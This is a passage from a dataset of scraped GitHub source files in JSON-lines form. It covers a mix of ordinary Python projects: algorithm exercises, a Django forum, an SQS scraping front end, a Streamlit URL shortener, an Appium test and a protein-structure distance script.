betas_broad).sum(1)\n    return yhat_r\n\n\ndef get_to_kwargs(x) -> dict:\n    if isinstance(x, torch.nn.Module):\n        return get_to_kwargs(next(iter(x.parameters())))\n    return {'dtype': x.dtype, 'device': x.device}\n\n\ndef pad_res_per_gf(res_per_gf: Dict[str, torch.Tensor],\n                   group_ids_predict: Sequence,\n                   group_ids_solve: Sequence,\n                   fill_value: float,\n                   verbose: bool = False) -> Dict[str, torch.Tensor]:\n    # there is no requirement that all groups in `group_ids` are present in `group_data`, or vice versa, so\n    # need to map the re_solve output\n    res_per_gf_padded = {}\n    for gf_i, gf in enumerate(res_per_gf):\n        ugroups_target = {gid: i for i, gid in enumerate(np.unique(group_ids_predict[:, gf_i]))}\n        ugroups_solve = {gid: i for i, gid in enumerate(np.unique(group_ids_solve[:, gf_i]))}\n        set1 = set(ugroups_solve) - set(ugroups_target)\n        if set1 and verbose:\n            print(f\"there are {len(set1):,} groups in solve data but not in predict data\")\n        set2 = set(ugroups_target) - set(ugroups_solve)\n        if set2 and verbose:\n            print(f\"there are {len(set2):,} groups in predict data but not in solve data\")\n\n        res_per_gf_padded[gf] = torch.full(\n            (len(ugroups_target), res_per_gf[gf].shape[-1]),\n            fill_value=fill_value,\n            device=res_per_gf[gf].device,\n            dtype=res_per_gf[gf].dtype\n        )\n        for gid_target, idx_target in ugroups_target.items():\n            idx_solve = ugroups_solve.get(gid_target)\n            if idx_solve is None:\n                continue\n            res_per_gf_padded[gf][idx_target] = res_per_gf[gf][idx_solve]\n    return res_per_gf_padded\n","repo_name":"strongio/torch-hlm","sub_path":"torch_hlm/mixed_effects_module/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70876681153","text":"from math import sqrt\n\ndef distance(a, b):\n    # sqrt ( (Xa - Xb)^2 + (Ya - Yb)^2 )\n    return sqrt((a[0] - b[0]) * (a[0] - b[0]) + (a[1] - b[1]) * (a[1] - b[1]))\n\n\ndef viraj_dreapta(q): # function that checks whether the last 3 points in a list make a right turn or are collinear\n    # 1        1        1\n    # q[-3][0] q[-2][0] q[-1][0]\n    # q[-3][1] q[-2][1] q[-1][1]\n    det = q[-2][0] * q[-1][1] + q[-3][0] * q[-2][1] + q[-1][0] * q[-3][1] - q[-2][0] * q[-3][1] - q[-1][0] * q[-2][1] - q[-3][0] * q[-1][1]\n    if det <= 0:\n        return True\n    else:\n        return False\n\n\ndef convex_hull(arr):\n    conv = []\n    for point in arr:\n        conv.append(point)\n\n        while len(conv) >= 3 and viraj_dreapta(conv):\n            conv.pop(-2)\n\n    return conv\n\npoints = int(input())\n\narr_points = []\n\nfor i in range(points):\n    x, y = input().split()\n    arr_points.append((int(x),int(y)))\n\narr_points = sorted(arr_points, key=lambda b: (b[0], b[1]))\n\nunder = convex_hull(arr_points)\narr_points.reverse()\nupper = convex_hull(arr_points)\n\nconvHull = under + upper[1:-1]\n\nsums = [0 for i in range(points)]\n\nwhile len(convHull) < points:\n    pts = {}\n\n    for point in arr_points:\n        if point not in convHull:\n            min = 9999\n            length = len(convHull)\n            for i in range(length):\n                cost_ipj = distance(convHull[i], point) + distance(point, convHull[(i + 1) % length] )\n                cost_ij = distance(convHull[i], convHull[(i + 1) % length] )\n                sum = cost_ipj - cost_ij\n                if sum < min:\n                    pts[point] = (sum, i, cost_ipj / cost_ij)\n                    min = sum\n\n    min = 9999\n    ind = ()\n    for pct in pts.keys():\n        division = pts[pct][2]\n        if division < min:\n            min = division\n            ind = pct\n\n    convHull.insert(pts[ind][1] + 1, 
ind)\n\nprint(convHull)","repo_name":"ccazacu13/Advanced-algorithms-","sub_path":"Lab1/traveling_salesman.py","file_name":"traveling_salesman.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41788524885","text":"import json\nimport time\n\nimport boto.sqs\nfrom boto.sqs.message import RawMessage\nfrom boto.s3.connection import S3Connection\n\nfrom dateutil.parser import parse as parse_date\nfrom datetime import datetime, timedelta\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom .forms import ImmediateForm\n\nSERVER_NAME = 'test_server'\n\nQUEUE_INPUT = 'scraper_walmart-test_in'\nQUEUE_OUTPUT = 'immediate_output'\n\nTIMEOUT_LITE = 60 * 5 # wait 5 minutes for the response in the output queue\nTIMEOUT_HARD = 60 * 60 # store messages in the output queue for 60 minutes\nTIMEOUT_VISIBILITY = 3 # 3 sec for scanning output queue\n\n\ndef immediate_run(request):\n if request.method == 'POST':\n form = ImmediateForm(request.POST)\n\n if form.is_valid():\n url = form.cleaned_data['url']\n site = form.cleaned_data['site']\n\n response = {\n 'success': True,\n 'url': url,\n }\n\n try:\n # try to find message for the same request\n message = find_message(site, url)\n\n if not message:\n send_message(site, url)\n\n message = find_message(site, url, timeout=TIMEOUT_LITE)\n if message:\n response['sqs'] = message\n\n data = get_data(message)\n if data:\n response['result'] = data\n else:\n response['success'] = False\n response['message'] = 'Task failed. No data'\n else:\n response['message'] = 'Task is not ready yet, check later'\n except Exception as e:\n response['success'] = False\n response['message'] = e.message\n\n return JsonResponse(response)\n else:\n form = ImmediateForm()\n\n return render(request, 'form.html', {'form': form})\n\n\ndef send_message(site, url):\n body = {\n 'site': site,\n 'server_name': SERVER_NAME,\n 'url': url,\n 'response_format': 'sc', # TODO: let to select CH\n 'result_queue': QUEUE_OUTPUT\n }\n\n message = RawMessage()\n message.set_body(json.dumps(body))\n\n queue = get_queue(QUEUE_INPUT)\n queue.write(message)\n\n\ndef find_message(site, url, timeout=None):\n queue = get_queue(QUEUE_OUTPUT)\n\n time_start = time.time()\n\n while timeout is None or time.time() - time_start < timeout:\n # scan output queue\n messages = queue.get_messages(num_messages=10, visibility_timeout=TIMEOUT_VISIBILITY)\n\n for message in messages:\n body = message.get_body()\n\n if isinstance(body, basestring):\n body = json.loads(body)\n\n # remove old messages\n utc_datetime = body.get('utc_datetime', None)\n\n if utc_datetime:\n utc_datetime = parse_date(utc_datetime)\n\n if utc_datetime < datetime.now() - timedelta(seconds=TIMEOUT_HARD):\n queue.delete_message(message)\n\n continue\n\n if body.get('site') == site and body.get('url') == url:\n queue.delete_message(message)\n\n return body\n\n # not repeat\n if timeout is None:\n break\n\n\ndef get_data(body):\n if body.get('status') == 'success':\n bucket = body.get('bucket_name') or 'spyder-bucket'\n json_data_file = body.get('s3_key_data', None) or body.get('s3_filepath', None)\n\n aws_connection = S3Connection()\n bucket = aws_connection.get_bucket(bucket)\n key = bucket.get_key(json_data_file)\n\n return json.loads(key.get_contents_as_string())\n\n\ndef get_queue(name):\n connection = boto.sqs.connect_to_region(\"us-east-1\")\n queue = connection.lookup(name)\n\n if not queue:\n queue = 
connection.create_queue(name)\n\n    return queue\n","repo_name":"aprosdev/ecom-predictor","sub_path":"product-ranking/sqs_tests_gui/immediate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24068472619","text":"\n\nclass Artwork:\n    Artist = 'Artist'\n    Price = 'Price'\n\nNames = ['Bob', 'James', 'Helen', 'Sam', 'Jess', 'Maria', 'Kat']\nPrice = 7 * ['£100']\n\ndef Assign(Artwork, Attribute, Parameter):\n    # setattr/getattr are needed here: writing 'Artwork.Parameter = param' would\n    # create a literal attribute named 'Parameter' instead of setting the intended one\n    for param in Parameter:\n        setattr(Artwork, Attribute, param)\n        print(getattr(Artwork, Attribute))\n\nAssign(Artwork, 'Artist', Names)\nAssign(Artwork, 'Price', Price)\n","repo_name":"CharlizeY/ArtWorldInsights","sub_path":"Artprice/Testing/TestFind.py","file_name":"TestFind.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43615763810","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.translation import ugettext as _\n\nfrom snapboard.auth.decorators import login_required\nfrom snapboard.forms import *\nfrom snapboard.models import *\nfrom snapboard.utils import *\n\n\n# Ajax\n# ----\n\n@json_response\ndef preview(request):\n    return {'preview': sanitize(request.POST.get('text', ''))}\n\n@staff_member_required\n@json_response\ndef sticky(request):\n    thread = get_object_or_404(Thread, pk=request.POST.get('id'))\n    if toggle_boolean_field(thread, 'sticky'):\n        return {'link':_('unstick'), 'msg':_('This topic is sticky!')}\n    else:\n        return {'link':_('stick'), 'msg':_('This topic is not sticky.')}\n\n@staff_member_required\n@json_response\ndef close(request):\n    thread = get_object_or_404(Thread, pk=request.POST.get('id'))\n    if toggle_boolean_field(thread, 'closed'):\n        return {'link':_('open'), 'msg':_('This topic is closed.')}\n    else:\n        return {'link':_('close'), 'msg':_('This topic is open.')}\n\n@login_required\n@json_response\ndef watch(request):\n    thread = get_object_or_404(Thread, pk=request.POST.get('id'))\n    try:\n        # TODO: how to delete this rel\n        # thread.subscribers.objects.get(user=request.user, thread=thread).delete()\n        return {\n            'link': _('watch'), \n            'msg': _('This topic has been removed from your favorites.')\n        }\n    except: # WatchList.DoesNotExist:\n        WatchList.objects.create(user=request.user, thread=thread)\n        return {\n            'link': _('dont watch'), \n            'msg': _('This topic has been added to your favorites.')\n        }\n\n@login_required\n@json_response\ndef edit(request):\n    pk = request.POST.get('id')\n    post = get_object_or_404(Post.objects.get_user_query_set(request.user), pk=pk)\n    form = PostForm(request.POST, request=request, instance=post)\n    if form.is_valid():\n        post = form.save()\n        return {'preview': sanitize(post.text)}\n    return form.errors\n\n# Views\n# -----\n\ndef category_list(request, template='snapboard/category_list.html'):\n    ctx = {'categories': Category.objects.all()} \n    return render_and_cache(template, ctx, request)\n\ndef category(request, slug, template='snapboard/category.html'):\n    category = get_object_or_404(Category, slug=slug)\n    threads = category.thread_set.get_user_query_set(request.user)\n    ctx = {'category': category, 'threads': threads}\n    return render_and_cache(template, ctx, request)\n\ndef thread_list(request, template='snapboard/thread_list.html'):\n    # TODO: Keep sticky posts from clogging up the list.\n    threads = 
Thread.objects.get_user_query_set(request.user).order_by('-date')\n    return render_and_cache(template, {'threads': threads}, request)\n\ndef thread(request, cslug, tslug, template='snapboard/thread.html'):\n    thread = get_object_or_404(Thread.objects.filter(category__slug=cslug), slug=tslug)\n    form = PostForm(request.POST or None, request=request)\n    if form.is_valid():\n        post = form.save(thread)\n        return HttpResponseRedirect(post.get_url())\n    \n    ctx = {\n        'is_fav': thread.is_fav(request.user),\n        'posts': thread.get_posts(),\n        'thread': thread,\n        'form': form,\n        'category': thread.category\n    }\n    return render_and_cache(template, ctx, request)\n\ndef search(request, template='snapboard/search.html'):\n    threads = Thread.objects.get_user_query_set(request.user)\n    q = request.GET.get('q')\n    if q is not None:\n        threads = threads.filter(name__icontains=q)\n    return render(template, {'threads': threads}, request)\n\n@login_required\ndef new_thread(request, slug=None, template='snapboard/new_thread.html'):\n    category = None\n    if slug is not None:\n        category = get_object_or_404(Category, slug=slug)\n    form = ThreadForm(request.POST or None, request=request, category=category)\n    if form.is_valid():\n        thread = form.save()\n        return HttpResponseRedirect(thread.get_url())\n    return render(template, {'form': form, 'category': category}, request)\n\n@login_required\ndef favorites(request, template='snapboard/favorites.html'):\n    threads = Thread.objects.favorites(request.user)\n    return render(template, {'threads': threads}, request)\n\n@login_required\ndef edit_settings(request, template='snapboard/edit_settings.html'):\n    settings, _ = UserSettings.objects.get_or_create(user=request.user)\n    data = request.POST or None\n    sform = UserSettingsForm(data, instance=settings, request=request)\n    uform = UserNameForm(data, instance=request.user)\n    if request.POST:\n        if sform.is_valid() and uform.is_valid():\n            sform.save()\n            uform.save()\n            request.user.message_set.create(message='Preferences Updated.')\n            return HttpResponseRedirect('')\n    return render(template, {'sform': sform, 'uform': uform}, request)","repo_name":"johnboxall/snapboard","sub_path":"snapboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"5185506586","text":"import os\nimport streamlit as st\nimport requests\n\n# init page settings\nBACKEND_URL = os.getenv(\"BACKEND_URL\")\n\nst.set_page_config(page_title=\"URURL\")\n\nst.title(\"URURL.LIFE\")\nst.write(\"Make your url short and easy to share!\")\n\n# init session states\nif 'request_session' not in st.session_state.keys():\n    st.session_state['request_session'] = requests.Session()\n\nif \"user\" not in st.session_state.keys():\n    st.session_state[\"user\"] = None\n\n\n# random url generator layout\nwith st.form(\"random_form\"):\n    st.text_input(\"your url\", key=\"random_origin\")\n    random_submitted = st.form_submit_button(\"Shorten!\")\n\n# generate random url\nif random_submitted:\n    r = requests.post(\n        f\"{BACKEND_URL}/api/generate\",\n        json={\"origin\": st.session_state.get(\"random_origin\")},\n    )\n    if r.status_code == 200 or r.status_code == 201:\n        left, _ = st.columns(2)\n        left.success(f\"ururl is: {r.text}\")\n        st.balloons()\n    elif r.status_code // 100 in (4, 5):  # integer division: 404 // 100 == 4\n        st.error(f\"{r.status_code} Error: {r.text}\")\n\n\n# make extra space\nfor _ in range(2):\n    st.text(\"\\n \")\n\n\n# if logged in, show custom url generator\nif st.session_state['user']:\n    
st.header(\"Customize!\")\n st.write(\"You can make your own url!\")\n\n with st.form(\"custom_form\"):\n st.text_input(\"your url\", key=\"custom_origin\")\n st.text_input(\n \"custom id\",\n placeholder = \"\" if st.session_state['user'] else \"signin required\",\n key=\"custom_id\",\n disabled=not st.session_state['user'],\n )\n custom_sumitted = st.form_submit_button(\"Shorten!\")\n\n if custom_sumitted:\n if not st.session_state[\"custom_id\"]:\n st.error(\"signin required\")\n else:\n r = st.session_state['request_session'].post(\n f\"{BACKEND_URL}/api/custom/generate\",\n json={\"origin\": st.session_state[\"custom_origin\"], \"id\": st.session_state[\"custom_id\"]},\n )\n if r.status_code == 200 or r.status_code == 201:\n left, _ = st.columns(2)\n left.success(f\"ururl is: {r.text}\")\n st.balloons()\n elif r.status_code / 100 in (4, 5):\n st.error(f\"{r.status_code} Error: {r.text}\")\n\n# signin layout\nelse:\n st.header(\"Sign in\")\n st.markdown(\"\"\"Don't have an account? Sign up\"\"\", unsafe_allow_html=True)\n with st.form(\"signin_form\"):\n st.text_input(\"username\", key=\"signin_username\")\n st.text_input(\"password\", key=\"signin_password\", type=\"password\")\n signin_sumitted = st.form_submit_button(\"Sign in\")\n\n if signin_sumitted:\n r: requests.Response = st.session_state['request_session'].post(\n f\"{BACKEND_URL}/api/account/signin\",\n json={\n \"username\": st.session_state[\"signin_username\"],\n \"password\": st.session_state[\"signin_password\"],\n },\n )\n if r.status_code == 200:\n st.session_state[\"request_session\"].headers.update({\"X-CSRFToken\": r.cookies[\"csrftoken\"]})\n st.session_state[\"user\"] = st.session_state['request_session'].cookies.get_dict()\n elif r.status_code / 100 in (4, 5):\n st.error(f\"{r.status_code} Error: {r.text}\")\n st.experimental_rerun()\n","repo_name":"ChangHoon-Sung/ururl-front","sub_path":"🏡_Home.py","file_name":"🏡_Home.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15825831171","text":"from kivy.uix.widget import Widget\nfrom sprite import *\n#zmeiniajacy sie background - skoro juz ustalilem ze moge tylko sie odwolac do klasy w gamie zeby ja dodac jako widzet, a sourca sobie zrobic tutaj, to chcialbym\n#zrobic tutaj liste tel - przez ktore w jakichs sposob bedzie sie iterowac na takiej zasadzie jak w tej klasie. oczywiscie dalej bede musial rozkminic w jaki sposob bedzie\n#aktywowana zmiana poziomu, ale tutaj to chyba bedzie mozna zrobic na boolu.\nclass Background(Widget):#tworzy widzet\n def __init__(self):#przywoluje source jako cos gddzie bedzie wstawiany img lub atlas\n super(Background,self).__init__()#superuje ja zeby mozna bylo to uzyc w innych klasach(?)\n self.bacgrounds = [] #lista, ktora zawieralaby te rozne backgroundy.\n self.image = Sprite(source = 'img/1.png')#tworzy zmienna obrazu ktory jest subklasa sprajta\n self.add_widget(self.image)#dodaje obraz jako widzet(?)\n self.size = self.image.size#ustala rozmiar widzeta jako rozmiar obrazuCHYBA\n self.image_dupe = Sprite(source='img/1.png', x=self.width)#przywoluje drugi obrazek, z szerokoscia poprzedniego jako pozycja wyswietlajac go po nim\n self.add_widget(self.image_dupe)#wyswietla!! 
\n    def update(self):\n        self.image.x -= 2 # moves the first background to the left\n        self.image_dupe.x -= 2# moves the next sprite to the left as well\n\n        if self.image.right <= 0: # if the right edge of the image is at or below zero(?)\n            self.image.x = 0 # puts the first image back at its original position\n            self.image_dupe.x = self.width # puts the second image where the first one was\n\n","repo_name":"ESPP-ZDT/infinite_darkness","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8404823198","text":"# coding=utf-8\nimport sys,os\n# curPath = os.path.abspath(os.path.dirname(__file__))\n# rootPath = os.path.split(curPath)[0]\n# sys.path.append(rootPath)\n\nsys.path.append(os.getcwd())\nfrom appium import webdriver\nfrom test0304_1.scripts.search.search import Search_page\nimport pytest\n\nclass Test_search_text:\n    def setup_class(self):\n\n        desired_caps = {}\n        desired_caps[\"platformVersion\"] = \"6.0.1\"\n        # allow entering Chinese text\n        desired_caps['unicodeKeyboard'] = True\n        desired_caps['resetKeyboard'] = True\n\n        desired_caps[\"deviceName\"] = \"192.168.2.168:5555\"\n        desired_caps[\"platformName\"] = \"Android\"\n        desired_caps[\"appPackage\"] = \"com.android.settings\"\n        desired_caps[\"appActivity\"] = \".GridSettings\"\n\n        self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\n        self.search_obj = Search_page(self.driver)\n\n    def teardown_class(self):\n        self.driver.quit()\n\n    @pytest.mark.parametrize(\"text\",[1,2,3])\n    def test_search(self,text):\n        self.search_obj.search_text(text)\n\n\n","repo_name":"szfwl/J_TEST","sub_path":"test0304_1/scripts/test_02.py","file_name":"test_02.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3239235096","text":"# https://leetcode.com/problems/digit-count-in-range/discuss/303469/Amazing-O(logN)-python-7-lines\n\n# Same as question 233. 
Number of Digit One\n# class Solution:\n#     def countDigitOne(self, n: int) -> int:\n#         pivot, res = 1, 0\n#         while n >= pivot:\n#             res += n // (10 * pivot) * pivot + min(pivot, max(n % (10 * pivot) - pivot + 1, 0))\n#             pivot *= 10\n#         return res\n# We need to handle d == 0 specially in this question (no leading zeros).\n\nclass Solution:\n    def digitsCount(self, d: int, low: int, high: int) -> int:\n        def helper(n, k):\n            pivot, res = 1, 0\n            while n >= pivot:\n                res += (n // (10 * pivot)) * pivot + min(pivot, max(n % (10 * pivot) - k * pivot + 1, 0))\n                res -= pivot if k == 0 else 0 # no leading zero\n                pivot *= 10\n            return res + 1 # last-digit can be zero\n        return helper(high, d) - helper(low-1, d)","repo_name":"chien-wei/LeetCode","sub_path":"1067_Digit_Count_in_Range.py","file_name":"1067_Digit_Count_in_Range.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33847677162","text":"from selenium import webdriver\nimport pytest\n\nclass TestA():\n    @pytest.fixture()\n    def test_setup(self):\n        self.driver = webdriver.Chrome(executable_path=r\"C:\\Users\\bhavy\\PycharmProjects\\amazon\\drivers\\chromedriver.exe\")\n        self.driver.get(\"https://letskodeit.teachable.com/pages/practice\")\n        yield\n        self.driver.close()\n        print('Test completed')\n\n    def test_login(self,test_setup):\n        print(\"Login success\")\n\n","repo_name":"bhavyarani123/nn","sub_path":"try/test_pp.py","file_name":"test_pp.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40187891371","text":"from miflora.miflora_poller import HistoryEntry\nfrom datetime import datetime\nimport math\n\nclass HistoryItem(object):\n\n    def __init__(self, tag: str, entry: HistoryEntry, battery_level: int, firmware_version: str):\n        self.plant_tag = tag\n        # self.device_time = entry.device_time\n        self.device_time = math.trunc(entry.wall_time.timestamp())\n        self.temperature = entry.temperature\n        self.light = entry.light\n        self.moisture = entry.moisture\n        self.conductivity = entry.conductivity\n        self.battery_level = battery_level\n        self.firmware_version = firmware_version\n","repo_name":"dragoscirjan/my-flora","sub_path":"flora-server/flora/models/history_item.py","file_name":"history_item.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16216123149","text":"\"\"\"\nCreated on : 10:29 AM\nAuthor : Xue Zhang\n\"\"\"\n\n\ndef get_root(i, links):\n    while i != links[i]:\n        i = links[links[i]]\n    return i\n\n\ndef roads_and_libraries(n, c_lib, c_road, cities):\n    if c_lib < c_road:\n        return n * c_lib\n    links = {i: i for i in range(1, n+1)}\n    length = {i: 1 for i in range(1, n+1)}\n    for a, b in cities:\n        a = get_root(a, links)\n        b = get_root(b, links)\n        if a != b:\n            if length[b] > length[a]:\n                a, b = b, a\n            links[b] = a\n            length[a] += length[b]\n    keys = [k for k in links if k == links[k]]\n    ans = {}\n    for k in keys:\n        ans[k] = length[k] - 1\n    total = len(ans) * c_lib + sum([c_road * v for v in ans.values()])\n    return total\n\n\nif __name__ == '__main__':\n    q = int(input())\n\n    for _ in range(q):\n        nmC_libC_road = input().split()\n\n        n_city = int(nmC_libC_road[0])\n\n        m_road = int(nmC_libC_road[1])\n\n        cost_lib = int(nmC_libC_road[2])\n\n        cost_road = int(nmC_libC_road[3])\n\n        cs = []\n\n        for _ in range(m_road):\n            cs.append(list(map(int, input().rstrip().split())))\n\n        result = 
roads_and_libraries(n_city, cost_lib, cost_road, cs)\n\n        print(result)\n","repo_name":"xiaoxue11/hank_practice","sub_path":"Graph/01_minCostLibrary.py","file_name":"01_minCostLibrary.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44478968610","text":"# Question: Intersection of two sets. Given two arrays 𝚊[] and 𝚋[], each containing \n# n distinct 2D points in the plane, design a subquadratic algorithm to count the \n# number of points that are contained both in array 𝚊[] and array 𝚋[].\n\n# Solution: Sort arrays a and b (takes O(m log m + n log n) time),\n# \tthen find the union / intersection of the two sorted arrays\n\n\ndef printIntersection(arr1, arr2, m, n):\n\tarr1.sort()\n\tarr2.sort()\n\n\ti, j = 0, 0\n\twhile i < m and j < n:\n\t\tif arr1[i] < arr2[j]:\n\t\t\ti += 1\n\t\telif arr2[j] < arr1[i]:\n\t\t\tj += 1\n\t\telse:\n\t\t\tprint(arr2[j])\n\t\t\tj += 1\n\t\t\ti += 1\n\n","repo_name":"seungjin-kim/Princeton-Algorithms-Course","sub_path":"Part 1/interview_questions/elementary_sorts/intersection_oc_two_sets_python.py","file_name":"intersection_oc_two_sets_python.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25709630795","text":"def binary_search(arr, x):\n    \"\"\"\n    Binary search for a matching last name inside the array\n\n    :param arr: list of chess player objects, sorted by last name\n    :param x: the last-name keyword to search for\n    :return: found, the object whose last name matches x (or None)\n    \"\"\"\n    # get the middle index by halving the length of the array\n    m = len(arr) // 2\n    found = None\n\n    while x.lower() != arr[m].last_name.lower():\n        # if the middle index drops below 1, break out of the loop\n        if m < 1:\n            break\n\n        if arr[m].last_name.lower() > x.lower():\n            arr = arr[:len(arr) // 2]\n\n        else:\n            start = len(arr) // 2 + 1\n\n            if start >= len(arr):\n                start = len(arr) // 2\n\n            arr = arr[start:]\n\n        m = len(arr) // 2\n    # if the last name matches with x, print the object details\n    if arr[m].last_name.lower() == x.lower():\n        print('yay! 
Found this: ')\n found = arr[m]\n print(f' {found}')\n else:\n print('sorry :(')\n print(f'Player {x} not found')\n\n return found\n","repo_name":"lanangwisnugiri/Chess-players-finder","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42201816423","text":"import os\nimport subprocess\n\nTrialNumber = 1\n\nAccelerationSet = [\"400\", \"600\", \"800\", \"1000\", \"1200\", \"1400\", \"1600\", \"1800\", \"2000\", \"2200\"]\nVelocitySet = [\"200\", \"300\", \"400\", \"500\", \"600\", \"700\", \"800\", \"900\", \"1000\", \"1100\"]\ncounter1 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\ncounter2 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nfor i in counter1:\n for j in counter2:\n acceleration = AccelerationSet[i]\n velocity = VelocitySet[j]\n trialString = str(TrialNumber)\n parameterString = trialString + \"|\" + acceleration + \"|\" + velocity\n sendData = parameterString.encode()\n child = subprocess.run([\"python\", \"main.py\"], input= sendData)\n TrialNumber += 1\n\n\n\n\n\n","repo_name":"Callum-Welsh/Cat-And-Rat-Experiment","sub_path":"Experiment.py","file_name":"Experiment.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31762133618","text":"#!/usr/bin/env python\nfrom math import sqrt as msqrt\nfrom scipy import *\nimport pdbParse\nimport sys, os, glob, errno\nfrom scipy.spatial.distance import cdist\nimport time\n\ncode = pdbParse.residueCode\nextracode = {'ABA': 'GLU', 'B3L': 'LEU', 'CAS': 'CYS', 'CIR': 'ARG', 'CME':\n 'CYS', 'CMT': 'CYS', 'CSD': 'CYS', 'CSO': 'CYS', 'CSS': 'CYS',\n 'CY0': 'CYS', 'FCL': 'PHE', 'KCX': 'LYS', 'L3O': 'LEU', 'LGY':\n 'LYS', 'MEA': 'PHE', 'MHO': 'MET', 'MSE': 'MET', 'NMM': 'ARG',\n 'OCS': 'CYS', 'OCY': 'CYS', 'PFF': 'TYR', 'PTR': 'TYR', 'SCS':\n 'CYS', 'SEP': 'SER', 'TPO': 'THR', 'TYI': 'TYR'}\ncode.update(dict((k, code[v]) for k,v in extracode.items()))\ncode = {k.encode('ascii'): v for k,v in code.items()}\n#note that these extra codes are unreliable, since some PDBS assign the same\n#name to different residues. So correct for that using MODRES below\n\nPDBdir = sys.argv[1]\nminL = int(sys.argv[2])\n\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else: raise\n\nmkdir_p('distancesNHA')\nmkdir_p('distancesSCC')\nmkdir_p('distancesSCNHA')\nmkdir_p('distancesCA')\nmkdir_p('distancesCB')\n\ndef vdist(a,b):\n return sqrt(sum((a-b)**2))\n\n\nfor pdbfn in glob.glob(PDBdir + '/*'):\n pdb = os.path.splitext(os.path.basename(pdbfn))[0]\n print(pdb)\n p = pdbParse.loadPDB(pdbfn)\n if len(p) == 0:\n print(\"Empty file? 
\", pdbfn)\n chains = [c for c in set(p.chain)]\n\n for chain in chains:\n name = pdb+'_'+chain.decode('ascii')\n\n if os.path.exists(os.path.join('distancesCB', name+'.npy')):\n print(\"Already done {}\".format(name))\n continue\n\n #get atoms, but remove unknown residues and remove duplicate conformers\n #Important that this is done in exactly the same way as in\n #getPDBseq.py so that \"seen\" residue indexes match\n c = p[(p.chain == chain)]\n c = c[((c.altLoc == b' ') | (c.altLoc == b'A')) & (c.resName != b'UNK')]\n\n CA = c[c.atom == b' CA ']\n\n resids = CA.resID\n L = len(resids)\n pairs = [(i,j) for i in range(L-1) for j in range(i+1,L)]\n\n if L < minL:\n print(\"Skipping {}: too short at L={}\".format(name, L))\n continue\n\n # compute Nearest-heavy-atom (NHA) distances\n atoms = c[c.element != b' H']\n atomids = atoms.resID\n cc = [atoms.coords[argwhere(atomids == id).ravel()] for id in resids]\n NHAdist = array([min(cdist(cc[i], cc[j]).ravel()) for i,j in pairs])\n\n # compute side-chain Nearest-heavy-atom (SCNHA) distances\n atoms = c[(c.element != b' H') & (c.atom != b' C ') &\n (c.atom != b' O ') & (c.atom != b' N ') &\n ((c.atom != b' CA ') | (c.resName == b'GLY'))]\n atomids = atoms.resID\n cc = [atoms.coords[argwhere(atomids == id).ravel()] for id in resids]\n cc = [ci if ci.size != 0 else [[nan,nan,nan]] for ci in cc]\n SCNHAdist = array([min(cdist(cc[i], cc[j]).ravel()) for i,j in pairs])\n\n # compute side-chain center (SCC) distances\n scc = array([mean(ci, axis=0) for ci in cc])\n SCCdist = cdist(scc, scc)[triu_indices(L,k=1)]\n\n # compute CA distance\n CAdist = cdist(CA.coords, CA.coords)[triu_indices(L,k=1)]\n\n # compute CB distance. Count CA as CB for gly\n CB = c[(c.atom == b' CB ') |\n ((c.atom == b' CA ') & (c.resName == b'GLY'))]\n inds = [argwhere(CB.resID == id).ravel() for id in resids]\n cc = array([CB.coords[ind[0]] if len(ind) > 0 else [nan,nan,nan]\n for ind in inds])\n CBdist = cdist(cc, cc)[triu_indices(L,k=1)]\n\n # sanity checks\n assert(len(CAdist) == len(CBdist))\n assert(len(CAdist) == len(NHAdist))\n # sanity check for clashes\n clashes = [(resids[i], resids[j]) for n,(i,j) in enumerate(pairs)\n if abs(i-j) > 4 and NHAdist[n] < 2.0]\n # 2.0 isdistance at which pymol draws bonds\n if len(clashes) > 0:\n clashes = 